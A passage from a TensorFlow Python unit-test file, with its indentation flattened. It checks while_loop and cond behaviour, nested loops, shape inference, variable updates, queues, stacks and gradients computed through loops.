with self.cached_session() as sess:
with ops.device("/cpu:0"):
c = constant_op.constant(2)
i0 = constant_op.constant(0)
r = control_flow_ops.while_loop(lambda i: i < 1000,
lambda i: math_ops.square(c) + i, [i0])
r_val = sess.run(r, options=run_options, run_metadata=run_metadata)
self.assertEqual(1000, r_val)
self.assertTrue(run_metadata.HasField("step_stats"))
unique_allocs = set()
for node_stat in run_metadata.step_stats.dev_stats[0].node_stats:
for output in node_stat.output:
unique_allocs.add(
output.tensor_description.allocation_description.ptr)
# Prior to cl/147536680, the number of unique allocations was about 1005.
self.assertLess(len(unique_allocs), 756)
def _testWhile_Gpu_1(self, use_gpu):
with self.test_session(use_gpu=use_gpu):
n = constant_op.constant(1.0)
c = lambda x: math_ops.less(x, 10.0)
b = lambda x: math_ops.add(x, 1.0)
r = control_flow_ops.while_loop(c, b, [n])
self.assertAllClose(10.0, r.eval())
def testWhile_Gpu_1(self):
self._testWhile_Gpu_1(use_gpu=False)
self._testWhile_Gpu_1(use_gpu=True)
def _testWhile_Gpu_2(self, use_gpu):
with self.test_session(use_gpu=use_gpu):
n = constant_op.constant(1.0)
c = lambda x: math_ops.less(x, 10.0)
def b(x):
with ops.device("/cpu:0"):
return math_ops.add(x, 1.0)
r = control_flow_ops.while_loop(c, b, [n])
self.assertAllClose(10.0, r.eval())
def testWhile_Gpu_2(self):
self._testWhile_Gpu_1(use_gpu=False)
self._testWhile_Gpu_1(use_gpu=True)
def testWhileShape(self):
with self.cached_session():
i = constant_op.constant(0)
m = array_ops.ones([2, 2])
c = lambda i, j: math_ops.less(i, 2)
def _b(i, j):
new_i = math_ops.add(i, 1)
new_j = array_ops.tile(j, [2, 2])
return [new_i, new_j]
r = control_flow_ops.while_loop(
c, _b, [i, m],
[i.get_shape(), tensor_shape.unknown_shape()])
r = r[1] * array_ops.ones([8, 8])
self.assertAllEqual(np.ones((8, 8)), r.eval())
def testWhileWithNonTensorInput_Scalar(self):
with self.cached_session():
n = 0
c = lambda x: x < 10000
b = lambda x: x + 1
r = control_flow_ops.while_loop(c, b, [n], parallel_iterations=20)
self.assertEqual(10000, r.eval())
def testWhileWithNonTensorInput_Vector(self):
with self.cached_session():
n = np.array([0]) # Note, [0] would not work here; that is a list
c = lambda x: x[0] < 10000
b = lambda x: array_ops.stack([x[0] + 1])
r = control_flow_ops.while_loop(c, b, [n], parallel_iterations=20)
self.assertEqual([10000], r.eval())
def testWhileShapeInference(self):
with self.cached_session():
i = constant_op.constant(0)
m = array_ops.ones([2, 2])
c = lambda i, j: math_ops.less(i, 2)
def b(i, j):
new_i = math_ops.add(i, 1)
new_j = array_ops.concat([j, j], 0)
return [new_i, new_j]
r = control_flow_ops.while_loop(
c, b, [i, m],
[i.get_shape(), tensor_shape.TensorShape([None, 2])])
self.assertTrue(r[1].get_shape()[0].value is None)
self.assertEqual(r[1].get_shape()[1], tensor_shape.Dimension(2))
with self.assertRaisesRegexp(
ValueError,
r"Input tensor 'ones:0' enters the loop with shape \(2, 2\), but has "
r"shape \(4, 2\) after one iteration. To allow the shape to vary "
r"across iterations, use the `shape_invariants` argument of "
r"tf.while_loop to specify a less-specific shape."):
r = control_flow_ops.while_loop(c, b, [i, m])
def testWhileShapeInferenceSparseTensor(self):
with self.cached_session():
values = constant_op.constant([2.0, 4.0], name="values")
indices = constant_op.constant(
[[0], [3]], dtype=dtypes.int64, name="indices")
shape = constant_op.constant([10], dtype=dtypes.int64, name="dense_shape")
i = constant_op.constant(0)
x = sparse_tensor.SparseTensor(indices, values, dense_shape=shape)
def c(i, _):
return i < 10
def b(i, x):
return [
i + 1,
sparse_tensor.SparseTensor(x.indices, x.values * 2.0, x.dense_shape)
]
_, r = control_flow_ops.while_loop(c, b, [i, x])
self.assertEqual(r.dense_shape.get_shape()[0].value, 1)
_, r = control_flow_ops.while_loop(
c, b, [i, x],
[i.get_shape(), tensor_shape.TensorShape([None])])
self.assertTrue(r.dense_shape.get_shape()[0].value is None)
with self.assertRaisesRegexp(ValueError, "is not compatible with"):
_, r = control_flow_ops.while_loop(
c, b, [i, x],
[i.get_shape(), tensor_shape.TensorShape([5])])
def testWhileShapeInferenceIndexedSlices(self):
with self.cached_session():
values = constant_op.constant([[2.0, 4.0], [3.0, 5.0]], name="values")
indices = constant_op.constant([0, 3], name="indices")
shape = constant_op.constant([10, 2], name="dense_shape")
i = constant_op.constant(0)
x = ops.IndexedSlices(values, indices, dense_shape=shape)
def c(i, _):
return i < 10
def b(i, x):
return [
i + 1,
ops.IndexedSlices(x.values * 2.0, x.indices, x.dense_shape)
]
_, r = control_flow_ops.while_loop(c, b, [i, x])
self.assertEqual(r.dense_shape.get_shape()[0].value, 2)
self.assertEqual(r.values.get_shape(), tensor_shape.TensorShape([2, 2]))
_, r = control_flow_ops.while_loop(
c, b, [i, x],
[i.get_shape(), tensor_shape.TensorShape([None, 2])])
self.assertEqual(r.dense_shape.get_shape()[0].value, 2)
self.assertTrue(r.values.get_shape()[0].value is None)
self.assertEqual(r.values.get_shape()[1].value, 2)
with self.assertRaisesRegexp(ValueError, "is not compatible with"):
_, r = control_flow_ops.while_loop(
c, b, [i, x],
[i.get_shape(), tensor_shape.TensorShape([None, 5])])
def _testNestedWhile_1(self, use_gpu):
with self.test_session(use_gpu=use_gpu):
n = constant_op.constant(0)
def cpu_sum(s):
c = lambda i, s: math_ops.less(i, 10)
def b(i, s):
i1 = math_ops.add(i, 1)
with ops.device("/cpu:0"):
s1 = math_ops.add(i, s)
return i1, s1
_, r_s = control_flow_ops.while_loop(c, b, [n, s])
return r_s
c = lambda x: math_ops.less(x, 200)
b = lambda x: math_ops.add(x, cpu_sum(n))
r = control_flow_ops.while_loop(c, b, [n])
self.assertEqual(225, r.eval())
def testNestedWhile_1(self):
self._testNestedWhile_1(use_gpu=False)
self._testNestedWhile_1(use_gpu=True)
def _testNestedWhile_2(self, use_gpu):
# Test the cases that A -> Enter and Exit -> A are partitioned.
with self.test_session(use_gpu=use_gpu):
s0 = constant_op.constant(2.0)
def inner_loop(s):
c = lambda s: math_ops.less(s, 20.0)
def b(s):
s1 = math_ops.add(s, s)
return s1
r_s = control_flow_ops.while_loop(c, b, [s], parallel_iterations=1)
return r_s
outer_c = lambda x: math_ops.less(x, 3000.0)
def outer_b(x):
x = logging_ops.Print(x, [x]) # Edge "Print -> Enter" is partitioned
x = inner_loop(x)
with ops.device("/cpu:0"):
x = math_ops.square(x) # Edge "Exit -> Square" is partitioned
return x
r = control_flow_ops.while_loop(
outer_c, outer_b, [s0], parallel_iterations=1)
self.assertEqual(1048576.0, r.eval())
def testNestedWhile_2(self):
self._testNestedWhile_2(use_gpu=False)
self._testNestedWhile_2(use_gpu=True)
def testWhileWithControl_1(self):
with self.cached_session():
n = constant_op.constant(0)
r = constant_op.constant(0)
condition = lambda n_, r_: math_ops.less(n_, 10)
def body(n_, r_):
n_ = math_ops.add(n_, 1)
with r_.graph.control_dependencies([r_]):
r_ = constant_op.constant(12)
return [n_, r_]
res = control_flow_ops.while_loop(
condition, body, [n, r], parallel_iterations=1)
self.assertAllEqual(12, res[1].eval())
def testWhileWithControl_2(self):
with self.cached_session():
r = constant_op.constant(0)
condition = lambda r_: math_ops.less(r_, 10)
def body(r_):
with r_.graph.control_dependencies([r_]):
r_ = constant_op.constant(12)
return [r_]
res = control_flow_ops.while_loop(
condition, body, [r], parallel_iterations=1)
self.assertAllEqual(12, res.eval())
def testWhileWithControl_3(self):
with self.cached_session() as sess:
b = array_ops.placeholder(dtypes.bool)
c = constant_op.constant(1)
x0 = constant_op.constant(0)
with ops.control_dependencies([b]):
r = control_flow_ops.while_loop(lambda x: x < 10, lambda x: x + c, [x0])
self.assertEqual(10, sess.run(r, {b: True}))
def testWhileWithControl_4(self):
with self.cached_session() as sess:
b = array_ops.placeholder(dtypes.bool)
c = constant_op.constant(1)
x0 = constant_op.constant(0)
with ops.control_dependencies([b]):
r = control_flow_ops.while_loop(
lambda x: x < 10, lambda x: x + array_ops.identity(c), [x0])
self.assertEqual(10, sess.run(r, {b: True}))
def testWhileWithControl_5(self):
with self.cached_session() as sess:
b = array_ops.placeholder(dtypes.bool)
c = constant_op.constant(1)
x0 = constant_op.constant(0)
def body(x):
with ops.control_dependencies([b]):
return x + c
r = control_flow_ops.while_loop(lambda x: x < 10, body, [x0])
self.assertEqual(10, sess.run(r, {b: True}))
def testWhileCondWithControl(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/113294377 (unknown shape)")
# Ensure that no control edges by an outer control dependency context are
# added to nodes inside cond/while contexts.
with self.cached_session() as sess:
const_true = lambda: constant_op.constant(True)
const_false = lambda: constant_op.constant(False)
cond = lambda i: control_flow_ops.cond(i > 0, const_true, const_false)
body = lambda i: control_flow_ops.cond(i > 0, lambda: i - 1, lambda: i)
with ops.control_dependencies([control_flow_ops.no_op()]):
loop = control_flow_ops.while_loop(cond, body,
(constant_op.constant(5),))
self.assertEqual(0, sess.run(loop))
def testWhileCondWithControl_1(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/113324949 (ref vars)")
with self.cached_session():
v = variable_scope.get_variable(
"v", [], initializer=init_ops.constant_initializer(2))
i0 = constant_op.constant(0)
with ops.control_dependencies([i0]):
def loop_condition(i):
return i < 4
def loop_body(i):
some_cond = control_flow_ops.cond(
constant_op.constant(True),
lambda: state_ops.assign(v, math_ops.square(v)), lambda: v)
with ops.control_dependencies([some_cond]):
return i + 1
r = control_flow_ops.while_loop(loop_condition, loop_body, (i0,))
variables.global_variables_initializer().run()
self.assertEqual(4, r.eval())
self.assertAllClose(65536.0, v.eval())
def testWhileCondExitControl(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/113294340 (enable while_v2)")
with self.cached_session():
v = variables.Variable(1)
def false_branch():
cond = lambda i: i < 100
def body(i):
x = state_ops.assign(v, i)
return x + 1
loop = control_flow_ops.while_loop(cond, body, [0])
# Make sure to handle correctly control edge from Exit to a node.
with ops.control_dependencies([loop]):
return constant_op.constant(6.0)
r = control_flow_ops.cond(
constant_op.constant(False), lambda: constant_op.constant(1.0),
false_branch)
variables.global_variables_initializer().run()
self.assertEqual(6.0, r.eval())
self.assertEqual(99, v.eval())
def testCondWhile_1(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/111124878 (don't return tuple)")
with self.cached_session():
n = ops.convert_to_tensor(0, name="n")
c = lambda x: math_ops.less(x, 10)
b = lambda x: math_ops.add(x, 1)
r = control_flow_ops.cond(
math_ops.less(0, 1), lambda: control_flow_ops.while_loop(c, b, [n]),
lambda: n)
self.assertAllEqual(10, r.eval())
def testCondWhile_2(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/111124878 (don't return tuple)")
with self.cached_session():
n = ops.convert_to_tensor(0)
c = lambda x: math_ops.less(x, 10)
b = lambda x: math_ops.add(x, 1)
r = control_flow_ops.cond(
math_ops.less(1, 0), lambda: math_ops.add(n, 1),
lambda: control_flow_ops.while_loop(c, b, [n]))
self.assertAllEqual(10, r.eval())
def _testCondWhile_3(self, use_gpu):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/113294340 (enable while_v2)")
with self.test_session(use_gpu=use_gpu) as sess:
p = array_ops.placeholder(dtypes.bool)
n = constant_op.constant(0.0)
def c(x):
return math_ops.less(x, 10.0)
def b(x):
with ops.device("/cpu:0"):
x1 = math_ops.add(x, 1.0)
return x1
r = control_flow_ops.cond(p,
lambda: control_flow_ops.while_loop(c, b, [n]),
lambda: math_ops.multiply(n, 2.0))
r1 = gradients_impl.gradients(r, [n])
self.assertEqual(10, sess.run(r, {p: True}))
self.assertEqual([1.0], sess.run(r1, {p: True}))
self.assertEqual(0.0, sess.run(r, {p: False}))
self.assertEqual([2.0], sess.run(r1, {p: False}))
def testCondWhile_3(self):
self._testCondWhile_3(use_gpu=False)
self._testCondWhile_3(use_gpu=True)
def testWhileCond_1(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/113294377 (unknown shape)")
with self.cached_session():
i = ops.convert_to_tensor(0, name="i")
n = ops.convert_to_tensor(10, name="n")
one = ops.convert_to_tensor(1, name="one")
c = lambda x: math_ops.less(x, n)
# pylint: disable=undefined-variable
# for OSS build
b = lambda x: control_flow_ops.cond(
constant_op.constant(True),
lambda: math_ops.add(x, one), lambda: math_ops.subtract(x, one))
# pylint: enable=undefined-variable
r = control_flow_ops.while_loop(c, b, [i])
self.assertAllEqual(10, r.eval())
def testWhileCond_2(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/113294377 (unknown shape)")
with self.cached_session():
n = ops.convert_to_tensor(0, name="n")
c = lambda x: math_ops.less(x, 10)
b = lambda x: control_flow_ops.cond(constant_op.constant(True), lambda: math_ops.add(x, 1), lambda: n)
r = control_flow_ops.while_loop(c, b, [n])
self.assertAllEqual(10, r.eval())
def testWhileCond_3(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/113294377 (unknown shape)")
with self.cached_session():
n = ops.convert_to_tensor(0)
c = lambda x: math_ops.less(x, 10)
# pylint: disable=undefined-variable
# for OSS build
b = lambda x: control_flow_ops.cond(math_ops.less(0, 1),
lambda: math_ops.add(x, 1),
lambda: math_ops.subtract(x, 1))
# pylint: enable=undefined-variable
r = control_flow_ops.while_loop(c, b, [n])
self.assertAllEqual(10, r.eval())
# NOTE: It is ok to have parallel_iterations > 1
def testWhileUpdateVariable_1(self):
with self.cached_session():
select = variables.Variable([3.0, 4.0, 5.0])
n = constant_op.constant(0)
def loop_iterator(j):
return math_ops.less(j, 3)
def loop_body(j):
ns = state_ops.scatter_update(select, j, 10.0)
nj = math_ops.add(j, 1)
op = control_flow_ops.group(ns)
nj = control_flow_ops.with_dependencies([op], nj)
return [nj]
r = control_flow_ops.while_loop(
loop_iterator, loop_body, [n], parallel_iterations=1)
variables.global_variables_initializer().run()
self.assertEqual(3, r.eval())
result = select.eval()
self.assertAllClose(np.array([10.0, 10.0, 10.0]), result)
def testWhileUpdateVariable_2(self):
with self.cached_session():
select1 = variables.Variable([3.0, 4.0, 5.0])
select2 = variables.Variable([3.0, 4.0, 5.0])
n = constant_op.constant(0)
def loop_iterator(j):
return math_ops.less(j, 3)
def loop_body(j):
ns1 = state_ops.scatter_update(select1, j, 10.0)
ns2 = state_ops.scatter_update(select2, j, 10.0)
nj = math_ops.add(j, 1)
op = control_flow_ops.group(ns1, ns2)
nj = control_flow_ops.with_dependencies([op], nj)
return [nj]
r = control_flow_ops.while_loop(
loop_iterator, loop_body, [n], parallel_iterations=1)
variables.global_variables_initializer().run()
self.assertEqual(3, r.eval())
result1 = select1.eval()
self.assertAllClose(np.array([10.0, 10.0, 10.0]), result1)
result2 = select2.eval()
self.assertAllClose(np.array([10.0, 10.0, 10.0]), result2)
def testWhileUpdateVariable_3(self):
with self.cached_session():
select = variables.Variable([3.0, 4.0, 5.0])
n = constant_op.constant(0)
def loop_iterator(j, _):
return math_ops.less(j, 3)
def loop_body(j, _):
ns = state_ops.scatter_update(select, j, 10.0)
nj = math_ops.add(j, 1)
return [nj, ns]
r = control_flow_ops.while_loop(
loop_iterator,
loop_body, [n, array_ops.identity(select)],
parallel_iterations=1)
variables.global_variables_initializer().run()
result = r[1].eval()
self.assertAllClose(np.array([10.0, 10.0, 10.0]), result)
# b/24814703
def testWhileUpdateVariable_4(self):
with self.cached_session():
var_a = variables.Variable(0, name="a")
var_b = variables.Variable(0, name="b")
variables.global_variables_initializer().run()
c = constant_op.constant(0, name="c")
asn1 = state_ops.assign_add(var_a, 1, name="a_add")
# Loop condition
def pred(i):
return math_ops.less(i, 10)
# Loop body
def loop_body(i):
asn2 = state_ops.assign_add(var_b, asn1, name="b_add")
with ops.control_dependencies([asn2]):
ni = math_ops.add(i, 1, name="i_add")
return ni
lpa = control_flow_ops.while_loop(
pred, loop_body, [c], parallel_iterations=1)
self.assertEqual(0, var_b.eval())
lpa.eval() # Run the loop
self.assertEqual(10, var_b.eval())
# b/24736492
def testWhileUpdateVariable_5(self):
with self.cached_session():
# Create some variables.
var_a = variables.Variable(0, name="a")
var_b = variables.Variable(0, name="b")
variables.global_variables_initializer().run()
# Change condition to check var_b
def pred(_):
return math_ops.less(var_b, 10)
# Change body to increment var_b
def loop_body(i):
asn1 = state_ops.assign_add(
var_a, constant_op.constant(1), name="a_add")
asn2 = state_ops.assign_add(
var_b, constant_op.constant(1), name="b_add")
with ops.control_dependencies([asn1, asn2]):
inc_b = array_ops.identity(var_b)
return inc_b
lpa = control_flow_ops.while_loop(
pred, loop_body, [var_b], parallel_iterations=1, name="loop")
self.assertEqual(0, var_b.eval())
lpa.eval() # Run the loop
self.assertEqual(10, var_a.eval())
self.assertEqual(10, var_b.eval())
# b/24814668
def testWhileUpdateVariable_6(self):
with self.cached_session():
# Create some variables.
var_a = variables.Variable(0, name="a")
var_b = variables.Variable(0, name="b")
c = constant_op.constant(0)
variables.global_variables_initializer().run()
# Loop condition
def pred(i):
return math_ops.less(i, 10)
# Loop body
def loop_body(i):
asn1 = state_ops.assign_add(var_a, 1, name="a_add")
with ops.control_dependencies([asn1]):
asn2 = state_ops.assign_add(var_b, var_a, name="b_add")
with ops.control_dependencies([asn2]):
ni = math_ops.add(i, 1, name="i_add")
return ni
lpa = control_flow_ops.while_loop(
pred, loop_body, [c], parallel_iterations=1, name="loop")
self.assertEqual(0, var_b.eval())
lpa.eval() # Run the loop
self.assertEqual(55, var_b.eval())
self.assertEqual(10, var_a.eval())
def testWhileQueue_1(self):
with self.cached_session():
q = data_flow_ops.FIFOQueue(-1, dtypes.int32)
i = constant_op.constant(0)
def c(i):
return math_ops.less(i, 10)
def b(i):
ni = math_ops.add(i, 1)
ni = control_flow_ops.with_dependencies([q.enqueue((i,))], ni)
return ni
r = control_flow_ops.while_loop(c, b, [i], parallel_iterations=1)
self.assertEqual([10], r.eval())
for i in xrange(10):
self.assertEqual([i], q.dequeue().eval())
def testWhileStack_1(self):
with self.cached_session():
s = gen_data_flow_ops.stack_v2(-1, dtypes.int32, stack_name="foo")
i = constant_op.constant(0)
def c(i):
return math_ops.less(i, 10)
def b(i):
ni = math_ops.add(i, 1)
ni = control_flow_ops.with_dependencies(
[gen_data_flow_ops.stack_push_v2(s, i)], ni)
return ni
r = control_flow_ops.while_loop(c, b, [i], parallel_iterations=1)
x = constant_op.constant(0)
def c1(i, _):
return math_ops.greater(i, 0)
def b1(i, x):
ni = math_ops.subtract(i, 1)
nx = x + gen_data_flow_ops.stack_pop_v2(s, dtypes.int32)
return [ni, nx]
_, rx = control_flow_ops.while_loop(
c1,
b1, [r, x],
[r.get_shape(), tensor_shape.unknown_shape()],
parallel_iterations=1)
self.assertEqual(45, rx.eval())
def _testWhileGrad_ColocateGradients(self, colocate):
gpu_dev_name = test.gpu_device_name() if test.is_gpu_available(
) else "/device:CPU:0"
graph = ops.Graph()
with graph.as_default():
v = constant_op.constant(2.0, name="v")
c = lambda v: math_ops.less(v, 100.0)
def b(x):
with ops.device(gpu_dev_name):
return math_ops.square(x)
loop = control_flow_ops.while_loop(c, b, [v], parallel_iterations=1)
r = gradients_impl.gradients(
loop, v, colocate_gradients_with_ops=colocate)[0]
r_ops = graph.get_operations()
r_devices = [(op.name, op.device) for op in r_ops]
self.assertTrue(any("Square" in op.name for op in r_ops))
for (name, dev) in r_devices:
if not colocate and name.endswith("Square"):
# Only forward graph contain gpu in Square device
self.assertTrue(gpu_dev_name in dev)
elif colocate and "Square" in name:
# Forward and backward graphs contain gpu in Square/Square_grad devices
self.assertTrue(gpu_dev_name in dev)
else:
self.assertFalse(gpu_dev_name in dev)
with self.test_session(graph=graph) as sess:
self.assertAllClose(1024.0, sess.run(r))
def testWhileGrad_ColocateGradients(self):
self._testWhileGrad_ColocateGradients(colocate=False)
self._testWhileGrad_ColocateGradients(colocate=True)
def testWhileGrad_Square(self):
with self.cached_session():
v = constant_op.constant(2.0, name="v")
c = lambda v: math_ops.less(v, 100.0)
b = math_ops.square
r = control_flow_ops.while_loop(c, b, [v], parallel_iterations=1)
r = control_flow_ops.cond(math_ops.less(1, 2), lambda: r, lambda: v)
r = gradients_impl.gradients(r, v)[0]
self.assertAllClose(1024.0, r.eval())
def testWhileGrad_Shape(self):
with self.cached_session():
x = array_ops.placeholder(dtypes.float32, shape=[None])
v = constant_op.constant([2.0], name="v")
n = constant_op.constant(0, name="n")
c = lambda i, v: math_ops.less(i, 5)
b = lambda i, v: [i + 1, math_ops.multiply(x, v)]
r = control_flow_ops.while_loop(
c,
b, [n, v],
[n.get_shape(), tensor_shape.unknown_shape()],
parallel_iterations=1)
r = gradients_impl.gradients(r[1], x)[0]
self.assertEqual([None], r.get_shape().as_list())
self.assertAllClose([810.0, 2560.0], r.eval(feed_dict={x: [3.0, 4.0]}))
def testWhileGrad_BaseShape(self):
with self.cached_session() as sess:
x = array_ops.placeholder(dtypes.float32, [None])
v0 = constant_op.constant([2.0, 2.0], name="v")
c = lambda v: constant_op.constant(False)
b = lambda v: math_ops.multiply(v, x)
r = control_flow_ops.while_loop(c, b, [v0])
y = math_ops.square(x)
r = gradients_impl.gradients([r, y], x)[0]
self.assertAllClose([2.0, 4.0], sess.run(r, feed_dict={x: [1.0, 2.0]}))
def testWhileGrad_MultipleUses(self):
with self.cached_session():
v = constant_op.constant(2.0, name="v")
c = lambda v: math_ops.less(v, 100.0)
b = math_ops.square
r = control_flow_ops.while_loop(c, b, [v], parallel_iterations=1)
r = math_ops.multiply(r, r)
r = gradients_impl.gradients(r, v)[0]
self.assertEqual(524288.0, r.eval())
def testWhileGrad_LoopAdd(self):
with self.cached_session():
v = constant_op.constant(2.0, name="v")
c = lambda v: math_ops.less(v, 100.0)
b = math_ops.square
r = control_flow_ops.while_loop(c, b, [v], parallel_iterations=1)
r = math_ops.add(r, r)
r = gradients_impl.gradients(r, v)[0]
self.assertAllClose(2048.0, r.eval())
def _testWhileGrad_Mul(self, use_gpu, p_iters):
with self.test_session(use_gpu=use_gpu) as sess:
a = constant_op.constant(3.0, name="a")
v = constant_op.constant(2.0, name="v")
c = lambda v: math_ops.less(v, 100.0)
b = lambda v: math_ops.multiply(v, a)
r = control_flow_ops.while_loop(c, b, [v], parallel_iterations=p_iters)
grad_a, grad_v = gradients_impl.gradients(r, [a, v])
grad_a_val, grad_v_val = sess.run([grad_a, grad_v])
self.assertAllClose(216.0, grad_a_val)
self.assertAllClose(81.0, grad_v_val)
def testWhileGrad_Mul(self):
self._testWhileGrad_Mul(use_gpu=False, p_iters=1)
self._testWhileGrad_Mul(use_gpu=False, p_iters=10)
self._testWhileGrad_Mul(use_gpu=True, p_iters=1)
self._testWhileGrad_Mul(use_gpu=True, p_iters=10)
def _testNestedWhileCondWhileGrad(self, use_gpu):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/113294377 (unknown shape)")
with self.test_session(use_gpu=use_gpu):
v = constant_op.constant(1.0)
def inner_loop(s):
z = constant_op.constant(0)
c = lambda i, x: math_ops.less(i, 4)
b = lambda i, x: [math_ops.add(i, 1), math_ops.multiply(x, 2.0)]
return control_flow_ops.while_loop(c, b, [z, s])
c = lambda x: math_ops.less(x, 128.0)
def b(x):
return control_flow_ops.cond(
constant_op.constant(True),
lambda: math_ops.square(inner_loop(x)[1]),
lambda: math_ops.multiply(x, 2.0))
r = control_flow_ops.while_loop(c, b, [v])
r = gradients_impl.gradients(r, v)[0]
self.assertAllClose(512.0, r.eval())
def testNestedWhileCondWhileGrad(self):
self._testNestedWhileCondWhileGrad(use_gpu=False)
self._testNestedWhileCondWhileGrad(use_gpu=True)
def testWhileGrad_Variable(self):
with self.cached_session():
a = variables.Variable(3.0)
v = constant_op.constant(2.0, name="v")
c = lambda v: math_ops.less(v, 100.0)
b = lambda v: math_ops.multiply(v, a)
r = control_flow_ops.while_loop(c, b, [v], parallel_iterations=1)
r = gradients_impl.gradients(r, a)
variables.global_variables_initializer().run()
self.assertAllClose(216.0, r[0].eval())
def testWhileGradInCond(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/110550782 (gradient w.r.t external variable)")
with self.cached_session():
n = ops.convert_to_tensor(1.0, name="n")
x = array_ops.placeholder(dtypes.float32, shape=None)
c = lambda n: math_ops.less(n, 10.0)
b = lambda n: math_ops.add(n, x)
def fn1():
r = control_flow_ops.while_loop(c, b, [n],
[tensor_shape.unknown_shape()])
return gradients_impl.gradients(r, x)
r = control_flow_ops.cond(math_ops.less(1, 2), fn1, lambda: x)
self.assertAllClose(9.0, r.eval(feed_dict={x: 1.0}))
def testGradInWhileWrtInitialLoopVal(self):
with self.cached_session():
x = array_ops.placeholder(dtypes.float32, shape=(), name="x")
y = x + 1
def body(i, v):
z = v * 2
return i + 1, gradients_impl.gradients(z, x)[0]
with self.assertRaisesRegexp(
ValueError,
"Cannot compute gradient inside while loop with respect to op 'x'. "
"We do not support taking the gradient wrt or through the initial "
"value of a loop variable. Gradients can be computed through "
"loop invariants or wrt the input parameters to the loop body."):
control_flow_ops.while_loop(lambda i, x: i < 3, body, [0, y])
def testWhileGradInWhile(self):
with self.cached_session():
n = ops.convert_to_tensor(1.0, name="n")
x = array_ops.placeholder(dtypes.float32, shape=None)
c = lambda n: math_ops.less(n, 10.0)
b = lambda n: math_ops.add(n, x)
def b1(n):
r = control_flow_ops.while_loop(c, b, [n],
[tensor_shape.unknown_shape()])
return gradients_impl.gradients(r, x)
r = control_flow_ops.while_loop(lambda n: n < 6.0, b1, [n],
[tensor_shape.unknown_shape()])
self.assertAllClose(9.0, r.eval(feed_dict={x: 1.0}))
def testCondGradInNestedWhiles(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/113346829 (gpu failure)")
def outer_body(i, x):
_, x = control_flow_ops.while_loop(
lambda j, x: j < 3, inner_body, [0, 0.0])
return i + 1, x
def inner_body(j, x):
y = control_flow_ops.cond(math_ops.less(x, 1), lambda: 2 * x, lambda: x)
return j + 1, gradients_impl.gradients(y, x)[0]
i, x = control_flow_ops.while_loop(lambda i, x: i < 3, outer_body, [0, 0.0])
with self.cached_session() as sess:
i_val, x_val = sess.run([i, x])
self.assertEqual(i_val, 3)
self.assertAllClose(x_val, 1.0)
def testWhile_NestedInput(self):
with self.cached_session() as sess:
named = collections.namedtuple("named", ("a", "b"))
loop_vars = [
named(a=constant_op.constant(0.0), b=constant_op.constant(1.0)),
(constant_op.constant(2.0), constant_op.constant(3.0)),
constant_op.constant(4.0)
]
c = lambda lv0, _1, _2: lv0.a < 100.0
def b(lv0, lv1, lv2):
lv0 = named(a=lv0.a + 1, b=lv0.b)
lv1 = (lv1[0] + 1, lv1[1])
lv2 += 2
return [lv0, lv1, lv2]
r = control_flow_ops.while_loop(c, b, loop_vars)
self.assertTrue(isinstance(r, list))
self.assertTrue(isinstance(r[0], named))
self.assertTrue(isinstance(r[1], tuple))
self.assertTrue(isinstance(r[2], ops.Tensor))
r_flattened = nest.flatten(r)
self.assertEqual([100.0, 1.0, 102.0, 3.0, 4.0 + 100 * 2.0],
sess.run(r_flattened))
def testWhile_NestedBadArityFails(self):
with self.cached_session():
named = collections.namedtuple("named", ("a", "b"))
loop_vars = [
named(a=constant_op.constant(0.0), b=constant_op.constant(1.0)),
(constant_op.constant(2.0), constant_op.constant(3.0)),
constant_op.constant(4.0)
]
c = lambda lv0, _1, _2: lv0.a < 100.0
def b(lv0, lv1, _):
return [lv0, lv1]
with self.assertRaisesRegexp(ValueError, "the same number of elements"):
control_flow_ops.while_loop(c, b, loop_vars)
def testWhileGrad_ys_xs(self):
with self.cached_session():
x = constant_op.constant(3.0, name="x")
y = constant_op.constant(2.0, name="y")
c = lambda x, y: math_ops.less(x, 100.0)
def b(x, y):
y1 = math_ops.add(x, y)
x1 = math_ops.multiply(x, y1)
return x1, y1
rx, ry = control_flow_ops.while_loop(c, b, [x, y], parallel_iterations=1)
r = gradients_impl.gradients([rx, ry], x)
self.assertAllClose(304.0, r[0].eval())
r = gradients_impl.gradients([rx, ry], y)
self.assertAllClose(124.0, r[0].eval())
r = gradients_impl.gradients([rx], x)
self.assertAllClose(295.0, r[0].eval())
r = gradients_impl.gradients([rx], y)
self.assertAllClose(120.0, r[0].eval())
def testWhileGrad_Dependency(self):
with self.cached_session():
i = constant_op.constant(0, name="i")
x = constant_op.constant(2.0, name="x")
c = lambda i, x: math_ops.less(i, 10)
def b(i, x):
x = math_ops.multiply(x, 2.0)
i = math_ops.add(i, 1)
return i, x
ri, rx = control_flow_ops.while_loop(c, b, [i, x], parallel_iterations=1)
r = gradients_impl.gradients([ri, rx], x)
self.assertAllClose(1024.0, r[0].eval())
r = gradients_impl.gradients([rx], x)
self.assertAllClose(1024.0, r[0].eval())
def testWhileGrad_NoGradient(self):
with self.cached_session():
v = constant_op.constant(2.0, name="v")
c = lambda v: math_ops.less(v, 100.0)
b = math_ops.square
r = control_flow_ops.while_loop(c, b, [v], back_prop=False)
r = math_ops.add(r, v)
r = gradients_impl.gradients(r, v)
self.assertAllClose(1.0, r[0].eval())
def testWhileGrad_NoDependency(self):
with self.cached_session() as sess:
variable = variables.Variable(array_ops.ones([2, 3]))
duration = array_ops.zeros([], dtype=dtypes.int32)
def cond(duration, tensor, _):
del tensor
return duration < 10
def body(duration, tensor, _):
return (duration + 1, tensor, tensor)
loop_vars = [duration, variable, variable]
tensors = control_flow_ops.while_loop(
cond=cond, body=body, loop_vars=loop_vars)
cost = math_ops.reduce_sum(tensors[2])
grad = gradients_impl.gradients(cost, [variable])
variables.global_variables_initializer().run()
self.assertAllClose(np.ones([2, 3]), sess.run(grad[0]))
def testWhileGrad_Const(self):
with self.cached_session() as sess:
c0 = constant_op.constant(0.0, name="c0")
